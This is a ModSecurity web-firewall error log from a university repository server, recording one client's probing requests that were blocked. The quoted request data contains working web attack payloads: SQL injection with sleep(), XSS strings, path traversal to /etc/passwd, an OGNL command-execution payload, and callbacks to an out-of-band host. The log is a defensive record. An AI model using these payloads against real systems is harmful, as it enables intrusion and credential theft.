[Tue Aug 29 11:49:05.451015 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAhujD4AAAAr"]
[Tue Aug 29 11:49:08.521405 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkwQVcAAAAS"]
[Tue Aug 29 11:49:09.392167 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAl4sUwAAAAf"]
[Tue Aug 29 11:49:10.377754 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAkyyAkAAAAW"]
[Tue Aug 29 11:49:15.375449 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAlIBbcAAAAn"]
[Tue Aug 29 11:51:05.374407 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAlIBd4AAAAn"]
[Tue Aug 29 11:51:05.386623 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAfWOBEAAAAL"]
[Tue Aug 29 11:51:05.604039 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBeYAAAAn"]
[Tue Aug 29 11:51:05.883450 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAm5BugAAAAA"]
[Tue Aug 29 11:51:06.046999 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OsCo-f0AAAhoHOcAAAAl"]
[Tue Aug 29 11:51:06.171789 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBf4AAAAn"]
[Tue Aug 29 11:51:08.625153 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAm-MbUAAAAI"]
[Tue Aug 29 11:51:08.640030 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm5BvoAAAAA"]
[Tue Aug 29 11:51:09.563931 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAmIbPAAAAAo"]
[Tue Aug 29 11:51:09.641462 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnB5T0AAAAJ"]
[Tue Aug 29 11:51:10.938383 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm-MbsAAAAI"]
[Tue Aug 29 11:51:11.569707 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAmOBcYAAAAU"]
[Tue Aug 29 11:51:12.760808 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAlIBgwAAAAn"]
[Tue Aug 29 11:51:13.533538 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAknENwAAAAB"]
[Tue Aug 29 11:51:13.550205 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAjdQTAAAAAZ"]
[Tue Aug 29 11:51:13.675129 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAknEN8AAAAB"]
[Tue Aug 29 11:51:14.752575 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAkyyD0AAAAW"]
[Tue Aug 29 11:51:15.663512 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAmNp28AAAAQ"]
[Tue Aug 29 11:51:15.755875 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAlUlh0AAAA0"]
[Tue Aug 29 11:51:15.999880 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAjdQTkAAAAZ"]
[Tue Aug 29 11:51:16.551050 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAkyyEMAAAAW"]
[Tue Aug 29 11:51:16.583696 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAl4sX4AAAAf"]
[Tue Aug 29 11:51:17.599513 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAnB5UsAAAAJ"]
[Tue Aug 29 11:51:17.637141 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnIlfYAAAAV"]
